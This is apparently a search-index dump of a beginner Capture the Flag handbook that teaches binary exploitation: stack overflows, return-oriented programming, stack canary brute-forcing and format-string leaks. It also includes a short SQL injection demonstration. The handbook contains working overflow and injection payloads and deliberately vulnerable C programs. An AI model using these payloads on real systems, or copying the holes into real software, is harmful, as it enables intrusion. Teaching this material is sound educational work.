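    return db.execute(
        'SELECT * FROM users WHERE username = ?', (username,)
    ).fetchall()

payload = "' OR 1=1 --"
print(find_user_unsafe(payload))  # every row: [('kchung',), ('admin',)]
print(find_user_safe(payload))    # no rows: []
print(find_user_safe('kchung'))   # [('kchung',)]
```

The payload here combines the `OR 1=1` condition with a trailing comment so that the leftover single quote is ignored.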
"}]} \ No newline at end of file +{"config": {"lang": ["en"], "separator": "[\\s\\-]+", "pipeline": ["stopWordFilter"]}, "docs": [{"location": "", "title": "Capture The Flag 101", "text": ""}, {"location": "#overview", "title": "Overview", "text": "Capture the Flags, or CTFs, are computer security competitions.
Teams of competitors (or just individuals) are pitted against each other in various challenges across multiple security disciplines, competing to earn the most points.
CTFs are often the beginning of one's cyber security career due to their team building nature and competitive aspect. In addition, there isn't a lot of commitment required beyond a weekend.
Info
For information about ongoing CTFs, check out CTFTime.
In this handbook you'll learn the basics\u2122 behind the methodologies and techniques needed to succeed in Capture the Flag competitions.
"}, {"location": "binary-exploitation/address-space-layout-randomization/", "title": "Address Space Layout Randomization (ASLR)", "text": "Address Space Layout Randomization (or ASLR) is the randomization of the place in memory where the program, shared libraries, the stack, and the heap are. This makes can make it harder for an attacker to exploit a service, as knowledge about where the stack, heap, or libc can't be re-used between program launches. This is a partially effective way of preventing an attacker from jumping to, for example, libc without a leak.
Typically, only the stack, heap, and shared libraries are ASLR enabled. It is still somewhat rare for the main program to have ASLR enabled, though it is being seen more frequently and is slowly becoming the default.
"}, {"location": "binary-exploitation/buffer-overflow/", "title": "Buffer Overflow", "text": "A Buffer Overflow is a vulnerability in which data can be written which exceeds the allocated space, allowing an attacker to overwrite other data.
"}, {"location": "binary-exploitation/buffer-overflow/#stack-buffer-overflow", "title": "Stack buffer overflow", "text": "The simplest and most common buffer overflow is one where the buffer is on the stack. Let's look at an example.
#include <stdio.h>\n#include <unistd.h>\n\nint main() {\n int secret = 0xdeadbeef;\n char name[100] = {0};\n read(0, name, 0x100);\n if (secret == 0x1337) {\n puts(\"Wow! Here's a secret.\");\n } else {\n puts(\"I guess you're not cool enough to see my secret\");\n }\n}\n
There's a tiny mistake in this program which will allow us to see the secret. name
is decimal 100 bytes, however we're reading in hex 100 bytes (=256 decimal bytes)! Let's see how we can use this to our advantage.
If the compiler chose to lay out the stack like this:
0xffff006c: 0xf7f7f7f7 // Saved EIP\n 0xffff0068: 0xffff0100 // Saved EBP\n 0xffff0064: 0xdeadbeef // secret\n...\n 0xffff0004: 0x0\nESP -> 0xffff0000: 0x0 // name\n
let's look at what happens when we read in 0x100 bytes of 'A's.
The first decimal 100 bytes are saved properly:
0xffff006c: 0xf7f7f7f7 // Saved EIP\n 0xffff0068: 0xffff0100 // Saved EBP\n 0xffff0064: 0xdeadbeef // secret\n...\n 0xffff0004: 0x41414141\nESP -> 0xffff0000: 0x41414141 // name\n
However when the 101st byte is read in, we see an issue:
0xffff006c: 0xf7f7f7f7 // Saved EIP\n 0xffff0068: 0xffff0100 // Saved EBP\n 0xffff0064: 0xdeadbe41 // secret\n...\n 0xffff0004: 0x41414141\nESP -> 0xffff0000: 0x41414141 // name\n
The least significant byte of secret
has been overwritten! If we follow the next 3 bytes to be read in, we'll see the entirety of secret
is \"clobbered\" with our 'A's
0xffff006c: 0xf7f7f7f7 // Saved EIP\n 0xffff0068: 0xffff0100 // Saved EBP\n 0xffff0064: 0x41414141 // secret\n...\n 0xffff0004: 0x41414141\nESP -> 0xffff0000: 0x41414141 // name\n
The remaining 152 bytes would continue clobbering values up the stack.
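The clobbering sequence above can be reproduced with a toy model in Python. This is only a sketch under the layout assumed in the diagrams (name at offset 0, secret at offset 100, then saved EBP and saved EIP); the `stack` bytearray and the helper names are illustrative and not part of the original program.

```python
import struct

# Toy model of the assumed layout: name occupies offsets 0..99,
# secret sits right after it at offset 100 (0x64).
stack = bytearray(112)
struct.pack_into('<I', stack, 100, 0xdeadbeef)  # secret
struct.pack_into('<I', stack, 104, 0xffff0100)  # saved EBP
struct.pack_into('<I', stack, 108, 0xf7f7f7f7)  # saved EIP

def read_into_name(data):
    # Like read(0, name, 0x100): copies bytes starting at name with no
    # regard for the 100-byte size of the buffer.
    stack[0:len(data)] = data

def secret():
    # Interpret the 4 bytes at offset 100 as a little-endian integer.
    return struct.unpack_from('<I', stack, 100)[0]

read_into_name(b'A' * 101)
print(hex(secret()))  # 0xdeadbe41: only the least significant byte changed

read_into_name(b'A' * 104)
print(hex(secret()))  # 0x41414141: secret is fully clobbered
```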
"}, {"location": "binary-exploitation/buffer-overflow/#passing-an-impossible-check", "title": "Passing an impossible check", "text": "How can we use this to pass the seemingly impossible check in the original program? Well, if we carefully line up our input so that the bytes that overwrite secret
happen to be the bytes that represent 0x1337 in little-endian, we'll see the secret message.
A small Python 2 one-liner will work nicely: python -c \"print 'A'*100 + '\\x37\\x13\\x00\\x00'\"
This will fill the name
buffer with 100 'A's, then overwrite secret
with the 32-bit little-endian encoding of 0x1337.
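Writing the little-endian bytes by hand is easy to get wrong, so it can be safer to let `struct.pack` produce them. The following Python 3 sketch builds the same payload; the function name `secret_payload` is hypothetical, and the 100-byte offset assumes the stack layout shown earlier.

```python
import struct

def secret_payload():
    # 100 bytes to fill name, followed by the value that should land in secret.
    padding = b'A' * 100
    value = struct.pack('<I', 0x1337)  # '<I' = little-endian unsigned 32-bit
    return padding + value

payload = secret_payload()
print(len(payload))        # 104
print(payload[-4:].hex())  # 37130000
```

To feed this to the program, the bytes can be written with `sys.stdout.buffer.write(payload)` and piped into the binary.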
As discussed on the stack page, the instruction that the current function should jump to when it is done is also saved on the stack (denoted as \"Saved EIP\" in the above stack diagrams). If we can overwrite this, we can control where the program jumps after main
finishes running, giving us the ability to control what the program does entirely.
Usually, the end objective in binary exploitation is to get a shell (often called \"popping a shell\") on the remote computer. The shell provides us with an easy way to run anything we want on the target computer.
Say there happens to be a nice function that does this defined somewhere else in the program that we normally can't get to:
void give_shell() {\n system(\"/bin/sh\");\n}\n
Well with our buffer overflow knowledge, now we can! All we have to do is overwrite the saved EIP on the stack to the address where give_shell
is. Then, when main returns, it will pop that address off of the stack and jump to it, running give_shell
, and giving us our shell.
Assuming give_shell
is at 0x08048fd0, we could use something like this: python -c \"print 'A'*108 + '\\xd0\\x8f\\x04\\x08'\"
We send 108 'A's to overwrite the 100 bytes that are allocated for name
, the 4 bytes for secret
, and the 4 bytes for the saved EBP. Then we simply send the little-endian form of give_shell
's address, and we would get a shell!
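The same payload can be assembled in Python 3 with `struct.pack`, which keeps the offset arithmetic explicit. This is a sketch under the assumptions stated in the text: `give_shell` at 0x08048fd0 and a layout of 100 bytes of name, 4 bytes of secret, and 4 bytes of saved EBP before the saved EIP. The function name `ret_payload` is hypothetical.

```python
import struct

GIVE_SHELL = 0x08048fd0  # address assumed in the text

def ret_payload(target):
    # name (100 bytes) + secret (4 bytes) + saved EBP (4 bytes) = 108 bytes
    padding = b'A' * (100 + 4 + 4)
    # The next 4 bytes overwrite the saved EIP with the target address.
    return padding + struct.pack('<I', target)

payload = ret_payload(GIVE_SHELL)
print(len(payload))        # 112
print(payload[-4:].hex())  # d08f0408
```

On a real binary the padding length depends on how the compiler actually laid out the stack frame, so it usually has to be confirmed in a debugger.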
This idea is extended in Return Oriented Programming.
"}, {"location": "binary-exploitation/heap-exploitation/", "title": "Heap Exploits", "text": ""}, {"location": "binary-exploitation/heap-exploitation/#overflow", "title": "Overflow", "text": "Much like a stack buffer overflow, a heap overflow is a vulnerability where more data than can fit in the allocated buffer is read in. This could lead to heap metadata corruption, or corruption of other heap objects, which could in turn provide new attack surface.
"}, {"location": "binary-exploitation/heap-exploitation/#use-after-free-uaf", "title": "Use After Free (UAF)", "text": "Once free
is called on an allocation, the allocator is free to re-allocate that chunk of memory in future calls to malloc
if it so chooses. However if the program author isn't careful and uses the freed object later on, the contents may be corrupt (or even attacker controlled). This is called a use after free or UAF.
#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <string.h>\n\ntypedef struct string {\n unsigned length;\n char *data;\n} string;\n\nint main() {\n struct string* s = malloc(sizeof(string));\n puts(\"Length:\");\n scanf(\"%u\", &s->length);\n s->data = malloc(s->length + 1);\n memset(s->data, 0, s->length + 1);\n puts(\"Data:\");\n read(0, s->data, s->length);\n\n free(s->data);\n free(s);\n\n char *s2 = malloc(16);\n memset(s2, 0, 16);\n puts(\"More data:\");\n read(0, s2, 15);\n\n // Now using s again, a UAF\n\n puts(s->data);\n\n return 0;\n}\n
In this example, we have a string
structure with a length and a pointer to the actual string data. We properly allocate, fill, and then free an instance of this structure. Then we make another allocation, fill it, and then improperly reference the freed string
. Due to how glibc's allocator works, s2
will actually get the same memory as the original s
allocation, which in turn gives us the ability to control the s->data
pointer. This could be used to leak program data.
Not only can the heap be exploited by the data in allocations, but exploits can also use the underlying mechanisms in malloc
, free
, etc. to exploit a program. This is beyond the scope of CTF 101, but here are a few recommended resources:
The No eXecute or the NX bit (also known as Data Execution Prevention or DEP) marks certain areas of the program as not executable, meaning that stored input or data cannot be executed as code. This is significant because it prevents attackers from being able to jump to custom shellcode that they've stored on the stack or in a global variable.
"}, {"location": "binary-exploitation/overview/", "title": "Overview", "text": ""}, {"location": "binary-exploitation/overview/#binary-exploitation", "title": "Binary Exploitation", "text": "Binaries, or executables, are machine code for a computer to execute. For the most part, the binaries that you will face in CTFs are Linux ELF files or the occasional windows executable. Binary Exploitation is a broad topic within Cyber Security which really comes down to finding a vulnerability in the program and exploiting it to gain control of a shell or modifying the program's functions.
Common topics addressed by Binary Exploitation or 'pwn' challenges include:
Relocation Read-Only (or RELRO) is a security measure which makes some binary sections read-only.
There are two RELRO \"modes\": partial and full.
"}, {"location": "binary-exploitation/relocation-read-only/#partial-relro", "title": "Partial RELRO", "text": "Partial RELRO is the default setting in GCC, and nearly all binaries you will see have at least partial RELRO.
From an attacker's point of view, partial RELRO makes almost no difference, other than forcing the GOT to come before the BSS in memory, which eliminates the risk of a buffer overflow on a global variable overwriting GOT entries.
"}, {"location": "binary-exploitation/relocation-read-only/#full-relro", "title": "Full RELRO", "text": "Full RELRO makes the entire GOT read-only which removes the ability to perform a \"GOT overwrite\" attack, where the GOT address of a function is overwritten with the location of another function or a ROP gadget an attacker wants to run.
Full RELRO is not a default compiler setting as it can greatly increase program startup time since all symbols must be resolved before the program is started. In large programs with thousands of symbols that need to be linked, this could cause a noticeable delay in startup time.
"}, {"location": "binary-exploitation/return-oriented-programming/", "title": "Return Oriented Programming", "text": "Return Oriented Programming (or ROP) is the idea of chaining together small snippets of assembly with stack control to cause the program to do more complex things.
As we saw in buffer overflows, having stack control can be very powerful since it allows us to overwrite saved instruction pointers, giving us control over what the program does next. Most programs don't have a convenient give_shell
function however, so we need to find a way to manually invoke system
or another exec
function to get us our shell.
Imagine we have a program similar to the following:
#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nchar name[32];\n\nint main() {\n printf(\"What's your name? \");\n read(0, name, 32);\n\n printf(\"Hi %s\\n\", name);\n\n printf(\"The time is currently \");\n system(\"/bin/date\");\n\n char echo[100];\n printf(\"What do you want me to echo back? \");\n // Intentional bug: reads up to 1000 bytes into a 100-byte buffer\n read(0, echo, 1000);\n puts(echo);\n\n return 0;\n}\n
We obviously have a stack buffer overflow on the echo
variable which can give us EIP control when main
returns. But we don't have a give_shell
function! So what can we do?
We can call system
with an argument we control! Since arguments are passed in on the stack in 32-bit Linux programs (see calling conventions), if we have stack control, we have argument control.
When main returns, we want our stack to look like something had normally called system
. Recall what is on the stack after a function has been called:
... // More arguments\n 0xffff0008: 0x00000002 // Argument 2\n 0xffff0004: 0x00000001 // Argument 1\nESP -> 0xffff0000: 0x080484d0 // Return address\n
So main
's stack frame needs to look like this:
0xffff0008: 0xdeadbeef // system argument 1\n 0xffff0004: 0xdeadbeef // return address for system\nESP -> 0xffff0000: 0x08048450 // return address for main (system's PLT entry)\n
Then when main
returns, it will jump into system
's PLT entry and the stack will appear just like system
had been called normally for the first time.
Note: we don't care about the return address system
will return to because we will have already gotten our shell by then!
This is a good start, but we need to pass an argument to system
for anything to happen. As mentioned in the page on ASLR, the stack and dynamic libraries \"move around\" each time a program is run, which means we can't easily use data on the stack or a string in libc for our argument. In this case however, we have a very convenient name
global which will be at a known location in the binary (in the BSS segment).
Our exploit will need to do the following:
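Enter a command for system to run (for example sh) as name
Overflow echo with filler bytes up to the saved EIP, followed by:
The address of system's PLT entry
A placeholder return address for system
The address of the name global to act as the first argument to system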
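The steps above can be sketched as a short Python script that builds both inputs. This is a minimal sketch under stated assumptions: OFFSET_TO_EIP (the distance from the start of echo to the saved EIP) and NAME_ADDR (the address of the name global) are hypothetical placeholders that you would look up with a debugger or disassembler. Only the PLT address 0x08048450 is taken from the stack diagram above.

```python
import struct

# Hypothetical values: find the real ones with a debugger or disassembler.
OFFSET_TO_EIP = 112        # assumed distance from echo[0] to the saved EIP
NAME_ADDR = 0x0804a040     # assumed address of the name global in the BSS
SYSTEM_PLT = 0x08048450    # system's PLT entry, as in the diagram above

def p32(value):
    # Pack a 32-bit value in little-endian byte order, as x86 expects.
    return struct.pack('<I', value)

# First read(): the command that system() will run, stored in name.
first_input = b'sh' + bytes(1)

# Second read(): overflow echo and lay out a fake call to system(name).
second_input = (
    b'A' * OFFSET_TO_EIP   # filler up to the saved EIP
    + p32(SYSTEM_PLT)      # main returns into system's PLT entry
    + p32(0xdeadbeef)      # return address for system (never used)
    + p32(NAME_ADDR)       # first argument to system: pointer to name
)

print(second_input[OFFSET_TO_EIP:].hex())
```

The three packed words after the filler are the same three stack slots shown in the diagram for main's stack frame, lowest address first.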
In 64-bit binaries we have to work a bit harder to pass arguments to functions. The basic idea of overwriting the saved RIP is the same, but as discussed in calling conventions, arguments are passed in registers in 64-bit programs. In the case of running system
, this means we will need to find a way to control the RDI register.
To do this, we'll use small snippets of assembly in the binary, called \"gadgets.\" These gadgets usually pop
one or more registers off of the stack, and then call ret
, which allows us to chain them together by making a large fake call stack.
For example, if we needed control of both RDI and RSI, we might find two gadgets in our program that look like this (using a tool like rp++ or ROPgadget):
0x400c01: pop rdi; ret\n0x400c03: pop rsi; pop r15; ret\n
We can set up a fake call stack with these gadgets to sequentially execute them, pop
ing values we control into registers, and then end with a jump to system
.
0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled\n 0xffff0020: 0x1337beef // value we want in r15 (probably garbage)\n 0xffff0018: 0x1337beef // value we want in rsi\n 0xffff0010: 0x400c03 // address that the rdi gadget's ret will return to - the pop rsi gadget\n 0xffff0008: 0xdeadbeef // value to be popped into rdi\nRSP -> 0xffff0000: 0x400c01 // address of rdi gadget\n
Stepping through this one instruction at a time, main
returns, jumping to our pop rdi
gadget:
RIP = 0x400c01 (pop rdi)\nRDI = UNKNOWN\nRSI = UNKNOWN\n\n 0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled\n 0xffff0020: 0x1337beef // value we want in r15 (probably garbage)\n 0xffff0018: 0x1337beef // value we want in rsi\n 0xffff0010: 0x400c03 // address that the rdi gadget's ret will return to - the pop rsi gadget\nRSP -> 0xffff0008: 0xdeadbeef // value to be popped into rdi\n
pop rdi
is then executed, popping the top of the stack into RDI:
RIP = 0x400c02 (ret)\nRDI = 0xdeadbeef\nRSI = UNKNOWN\n\n 0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled\n 0xffff0020: 0x1337beef // value we want in r15 (probably garbage)\n 0xffff0018: 0x1337beef // value we want in rsi\nRSP -> 0xffff0010: 0x400c03 // address that the rdi gadget's ret will return to - the pop rsi gadget\n
The RDI gadget then ret
s into our RSI gadget:
RIP = 0x400c03 (pop rsi)\nRDI = 0xdeadbeef\nRSI = UNKNOWN\n\n 0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled\n 0xffff0020: 0x1337beef // value we want in r15 (probably garbage)\nRSP -> 0xffff0018: 0x1337beef // value we want in rsi\n
RSI and R15 are popped:
RIP = 0x400c05 (ret)\nRDI = 0xdeadbeef\nRSI = 0x1337beef\n\nRSP -> 0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled\n
And finally, the RSI gadget ret
s, jumping to whatever function we want, but now with RDI and RSI set to values we control.
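The walkthrough above can be replayed with a tiny Python model. This is only a sketch: run_chain is a hypothetical helper that imitates ret and pop on a list of stack words, and the gadget addresses and values are the illustrative ones from the diagrams, not addresses from a real binary.

```python
import struct

POP_RDI = 0x400c01          # pop rdi; ret
POP_RSI_R15 = 0x400c03      # pop rsi; pop r15; ret
TARGET = 0x400d00           # function to call once the registers are set

# Fake call stack, lowest address first, matching the diagram above.
chain = [POP_RDI, 0xdeadbeef, POP_RSI_R15, 0x1337beef, 0x1337beef, TARGET]

# The bytes that would be written over the saved RIP and onwards.
payload = b''.join(struct.pack('<Q', word) for word in chain)

# What each gadget pops before its ret (taken from the gadget listing).
GADGETS = {POP_RDI: ['rdi'], POP_RSI_R15: ['rsi', 'r15']}

def run_chain(words):
    # Tiny model of the CPU: ret pops the next address into RIP,
    # and each pop moves the next stack word into a register.
    stack = list(words)
    regs = {}
    rip = stack.pop(0)              # main's ret
    while rip in GADGETS:
        for reg in GADGETS[rip]:
            regs[reg] = stack.pop(0)
        rip = stack.pop(0)          # the gadget's ret
    return rip, regs

rip, regs = run_chain(chain)
print(hex(rip), {name: hex(value) for name, value in regs.items()})
```

Each 64-bit stack slot is packed as 8 little-endian bytes, which is why the payload for six slots is 48 bytes long.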
Stack Canaries are a secret value placed on the stack which changes every time the program is started. Prior to a function return, the stack canary is checked and if it appears to be modified, the program exits immediately.
"}, {"location": "binary-exploitation/stack-canaries/#bypassing-stack-canaries", "title": "Bypassing Stack Canaries", "text": "Stack Canaries seem like a clear cut way to mitigate any stack smashing as it is fairly impossible to just guess a random 64-bit value. However, leaking the address and bruteforcing the canary are two methods which would allow us to get through the canary check.
"}, {"location": "binary-exploitation/stack-canaries/#stack-canary-leaking", "title": "Stack Canary Leaking", "text": "If we can read the data in the stack canary, we can send it back to the program later because the canary stays the same throughout execution. However Linux makes this slightly tricky by making the first byte of the stack canary a NULL, meaning that string functions will stop when they hit it. A method around this would be to partially overwrite and then put the NULL back or find a way to leak bytes at an arbitrary stack offset.
A few situations where you might be able to leak a canary:
The canary is determined when the program starts up for the first time which means that if the program forks, it keeps the same stack cookie in the child process. This means that if the input that can overwrite the canary is sent to the child, we can use whether it crashes as an oracle and brute-force 1 byte at a time!
This method can be used on fork-and-accept servers where connections are spun off to child processes, but only under certain conditions such as when the input accepted by the program does not append a NULL byte (read or recv).
Buffer (N Bytes) ?? ?? ?? ?? ?? ?? ?? ?? RBP RIP
Fill the buffer: N Bytes + 0x00 results in no crash
Buffer (N Bytes) 00 ?? ?? ?? ?? ?? ?? ?? RBP RIP
Fill the buffer:
N Bytes + 0x00 + 0x00 results in a crash
N Bytes + 0x00 + 0x01 results in a crash
N Bytes + 0x00 + 0x02 results in a crash
...
N Bytes + 0x00 + 0x51 results in no crash
Buffer (N Bytes) 00 51 ?? ?? ?? ?? ?? ?? RBP RIP
Repeat this bruteforcing process for 6 more bytes...
Buffer (N Bytes) 00 51 FE 0A 31 D2 7B 3C RBP RIP
Now that we have the stack cookie, we can overwrite the saved RIP and take control of the program!
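The byte-at-a-time search can be sketched in Python. This is a simulation, not an exploit: child_survives is a hypothetical stand-in for sending input to a forked child and checking whether the connection crashes, and SECRET_CANARY reuses the example canary bytes from the walkthrough.

```python
# Simulated target: stands in for a forked child that crashes on a wrong canary.
SECRET_CANARY = bytes.fromhex('0051fe0a31d27b3c')   # example value from the walkthrough

def child_survives(guess):
    # Hypothetical oracle: True when the overwritten prefix matches the canary.
    return SECRET_CANARY.startswith(guess)

def brute_force_canary(oracle, length=8):
    known = b''
    for _ in range(length):
        for candidate in range(256):
            attempt = known + bytes([candidate])
            if oracle(attempt):
                known = attempt      # this byte is correct, move to the next
                break
        else:
            raise RuntimeError('no byte value survived; the oracle is unreliable')
    return known

recovered = brute_force_canary(child_survives)
print(recovered.hex())
```

Because each byte is confirmed independently, the search needs at most 8 * 256 attempts instead of guessing the whole 64-bit value at once.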
"}, {"location": "binary-exploitation/what-are-buffers/", "title": "Buffers", "text": "A buffer is any allocated space in memory where data (often user input) can be stored. For example, in the following C program name
would be considered a stack buffer:
#include <stdio.h>\n#include <unistd.h>\n\nint main() {\n char name[64] = {0};\n read(0, name, 63);\n printf(\"Hello %s\", name);\n return 0;\n}\n
Buffers could also be global variables:
#include <stdio.h>\n#include <unistd.h>\n\nchar name[64] = {0};\n\nint main() {\n read(0, name, 63);\n printf(\"Hello %s\", name);\n return 0;\n}\n
Or dynamically allocated on the heap:
#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\nint main() {\n char *name = malloc(64);\n memset(name, 0, 64);\n read(0, name, 63);\n printf(\"Hello %s\", name);\n free(name);\n return 0;\n}\n
"}, {"location": "binary-exploitation/what-are-buffers/#exploits", "title": "Exploits", "text": "Given that buffers commonly hold user input, mistakes when writing to them could result in attacker controlled data being written outside of the buffer's space. See the page on buffer overflows for more.
"}, {"location": "binary-exploitation/what-are-calling-conventions/", "title": "Calling Conventions", "text": "To be able to call functions, there needs to be an agreed-upon way to pass arguments. If a program is entirely self-contained in a binary, the compiler would be free to decide the calling convention. However in reality, shared libraries are used so that common code (e.g. libc) can be stored once and dynamically linked in to programs that need it, reducing program size.
In Linux binaries, there are really only two commonly used calling conventions: cdecl for 32-bit binaries, and SysV for 64-bit.
"}, {"location": "binary-exploitation/what-are-calling-conventions/#cdecl", "title": "cdecl", "text": "In 32-bit binaries on Linux, function arguments are passed in on the stack in reverse order. A function like this:
int add(int a, int b, int c) {\n return a + b + c;\n}\n
would be invoked by pushing c
, then b
, then a
.
For 64-bit binaries, the first six integer or pointer arguments are passed in registers, in this order: RDI, RSI, RDX, RCX, R8, R9.
Any leftover arguments are then pushed onto the stack in reverse order, as in cdecl.
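As a rough illustration of the two conventions, the sketch below shows where each argument would end up. The helper names place_cdecl and place_sysv are made up for this example, and the model assumes every argument is an integer or pointer (floating point arguments use different registers under SysV).

```python
# Register order for integer and pointer arguments in the SysV 64-bit convention.
SYSV_REGISTERS = ['rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9']

def place_cdecl(args):
    # Every argument goes on the stack; the last argument is pushed first.
    return {'registers': {}, 'push_order': list(reversed(args))}

def place_sysv(args):
    # The first six arguments go in registers; the rest are pushed in reverse.
    in_regs = dict(zip(SYSV_REGISTERS, args))
    leftover = args[len(SYSV_REGISTERS):]
    return {'registers': in_regs, 'push_order': list(reversed(leftover))}

print(place_cdecl(['a', 'b', 'c']))
print(place_sysv([1, 2, 3, 4, 5, 6, 7, 8]))
```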
"}, {"location": "binary-exploitation/what-are-calling-conventions/#other-conventions", "title": "Other Conventions", "text": "Any method of passing arguments could be used as long as the compiler is aware of what the convention is. As a result, there have been many calling conventions in the past that aren't used frequently anymore. See Wikipedia for a comprehensive list.
"}, {"location": "binary-exploitation/what-are-registers/", "title": "Registers", "text": "A register is a location within the processor that is able to store data, much like RAM. Unlike RAM however, accesses to registers are effectively instantaneous, whereas reads from main memory can take hundreds of CPU cycles to return.
Registers can hold any value: addresses (pointers), results from mathematical operations, characters, etc. Some registers are reserved however, meaning they have a special purpose and are not \"general purpose registers\" (GPRs). On x86, the only 2 reserved registers are rip
and rsp
which hold the address of the next instruction to execute and the address of the stack respectively.
On x86, the same register can have different sized accesses for backwards compatibility. For example, the rax
register is the full 64-bit register, eax
is the low 32 bits of rax
, ax
is the low 16 bits, al
is the low 8 bits, and ah
is the high 8 bits of ax
(bits 8-15 of rax
).
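The relationship between these sub-registers can be checked with plain bit masks. The value given to rax below is an arbitrary example chosen so that every byte is distinct.

```python
rax = 0x1122334455667788      # arbitrary example value

eax = rax & 0xffffffff        # low 32 bits
ax = rax & 0xffff             # low 16 bits
al = rax & 0xff               # low 8 bits
ah = (rax >> 8) & 0xff        # bits 8 through 15

print(hex(eax), hex(ax), hex(al), hex(ah))
```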
A format string vulnerability is a bug where user input is passed as the format argument to printf
, scanf
, or another function in that family.
The format argument has many different specifiers which could allow an attacker to leak data if they control the format argument to printf
. Since printf
and similar are variadic functions, they will continue popping data off of the stack according to the format.
For example, if we can make the format argument \"%x.%x.%x.%x\", printf
will pop off four stack values and print them in hexadecimal, potentially leaking sensitive information.
printf
can also index to an arbitrary \"argument\" with the following syntax: \"%n$x\" (where n
is the decimal index of the argument you want).
While these bugs are powerful, they're very rare nowadays, as all modern compilers warn when printf
is called with a non-constant string.
#include <stdio.h>\n#include <unistd.h>\n\nint main() {\n int secret_num = 0x8badf00d;\n\n char name[64] = {0};\n read(0, name, 64);\n printf(\"Hello \");\n printf(name);\n printf(\"! You'll never get my secret!\\n\");\n return 0;\n}\n
Due to how GCC decided to lay out the stack, secret_num
is actually at a lower address on the stack than name
, so we only have to go to the 7th \"argument\" in printf
to leak the secret:
$ ./fmt_string\n%7$llx\nHello 8badf00d3ea43eef\n! You'll never get my secret!\n
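Since llx prints a full 8-byte value, the 4-byte secret shares the output with 4 neighbouring bytes of stack data. A small sketch of splitting the leaked value from the run above:

```python
leaked = int('8badf00d3ea43eef', 16)   # output of the run above
secret_num = leaked >> 32              # upper 4 bytes
neighbour = leaked & 0xffffffff        # lower 4 bytes, unrelated stack data

print(hex(secret_num), hex(neighbour))
```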
"}, {"location": "binary-exploitation/what-is-binary-security/", "title": "Binary Security", "text": "Binary Security is using tools and methods in order to secure programs from being manipulated and exploited. This tools are not infallible, but when used together and implemented properly, they can raise the difficulty of exploitation greatly.
Some methods covered include:
The Global Offset Table (or GOT) is a section inside of programs that holds addresses of functions that are dynamically linked. As mentioned in the page on calling conventions, most programs don't include every function they use to reduce binary size. Instead, common functions (like those in libc) are \"linked\" into the program so they can be saved once on disk and reused by every program.
Unless a program is marked full RELRO, the resolution of functions to their addresses in dynamic libraries is done lazily. All dynamic libraries are loaded into memory along with the main program at launch; however, functions are not mapped to their actual code until they're first called. For example, in the following C snippet puts
won't be resolved to an address in libc until after it has been called once:
#include <stdio.h>\n\nint main() {\n puts(\"Hi there!\");\n puts(\"Ok bye now.\");\n return 0;\n}\n
To avoid searching through shared libraries each time a function is called, the result of the lookup is saved into the GOT so future function calls \"short circuit\" straight to their implementation bypassing the dynamic resolver.
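Lazy resolution can be pictured with a toy Python model. Everything here is made up for illustration: the LIBC table, its addresses, and the call helper are hypothetical, and a real dynamic linker does far more work. The point is only that the lookup happens once and the result is cached in the GOT.

```python
# Toy model of lazy binding; the names and addresses are made up for illustration.
LIBC = {'puts': 0x7f0000001000, 'system': 0x7f0000002000}   # pretend libc symbol table
UNRESOLVED = 'resolver_stub'     # marker meaning: not resolved yet

got = {'puts': UNRESOLVED}       # before the first call, the GOT points at a stub
resolver_calls = []

def call(name):
    # Calling through the GOT: resolve on first use, then reuse the saved address.
    if got[name] == UNRESOLVED:
        resolver_calls.append(name)      # the stub asks the dynamic linker
        got[name] = LIBC[name]           # the result is written back into the GOT
    return got[name]

first = call('puts')
second = call('puts')
print(hex(first), hex(second), resolver_calls)
```

The resolver is recorded only once, even though puts is called twice, which mirrors the short circuit described above.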
This has two important implications:
These two facts will become very useful in Return Oriented Programming.
"}, {"location": "binary-exploitation/what-is-the-got/#plt", "title": "PLT", "text": "Before a functions address has been resolved, the GOT points to an entry in the Procedure Linkage Table (PLT). This is a small \"stub\" function which is responsible for calling the dynamic linker with (effectively) the name of the function that should be resolved.
"}, {"location": "binary-exploitation/what-is-the-heap/", "title": "The Heap", "text": "The heap is a place in memory which a program can use to dynamically create objects. Creating objects on the heap has some advantages compared to using the stack:
There are also some disadvantages however:
In C, there are a number of functions used to interact with the heap, but we're going to focus on the two core ones:
malloc: allocate n bytes on the heap
free: free the given allocation
Let's see how these could be used in a program:
#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\nint main() {\n unsigned alloc_size = 0;\n char *stuff;\n\n printf(\"Number of bytes? \");\n scanf(\"%u\", &alloc_size);\n\n stuff = malloc(alloc_size + 1);\n memset(stuff, 0, alloc_size + 1);\n\n read(0, stuff, alloc_size);\n\n printf(\"You wrote: %s\", stuff);\n\n free(stuff);\n\n return 0;\n}\n
This program reads in a size from the user, creates an allocation of that size on the heap, reads in that many bytes, then prints it back out to the user.
"}, {"location": "binary-exploitation/what-is-the-stack/", "title": "The Stack", "text": "In computer architecture, the stack is a hardware manifestation of the stack data structure (a Last In, First Out queue).
In x86, the stack is simply an area in RAM that was chosen to be the stack - there is no special hardware to store stack contents. The esp
/rsp
register holds the address in memory where the bottom of the stack resides. When something is push
ed to the stack, esp
decrements by 4 (or 8 on 64-bit x86), and the value that was push
ed is stored at that location in memory. Likewise, when a pop
instruction is executed, the value at esp
is retrieved (i.e. esp
is dereferenced), and esp
is then incremented by 4 (or 8).
N.B. The stack \"grows\" down to lower memory addresses!
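The push and pop behaviour described above can be modelled in a few lines of Python. Stack32 is a hypothetical helper for illustration only, and the starting address and pushed values are arbitrary examples.

```python
class Stack32:
    # Minimal model of a 32-bit x86 stack: memory is a dict of address to value.
    def __init__(self, esp):
        self.esp = esp
        self.memory = {}

    def push(self, value):
        self.esp -= 4                    # esp moves to a lower address first
        self.memory[self.esp] = value    # then the value is stored there

    def pop(self):
        value = self.memory[self.esp]    # read the value esp points at
        self.esp += 4                    # then esp moves back up
        return value

stack = Stack32(esp=0xffff0008)
stack.push(0xffffa0a0)
stack.push(0x0804845a)
esp_after_pushes = stack.esp
top = stack.pop()
print(hex(esp_after_pushes), hex(top), hex(stack.esp))
```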
Conventionally, ebp
/rbp
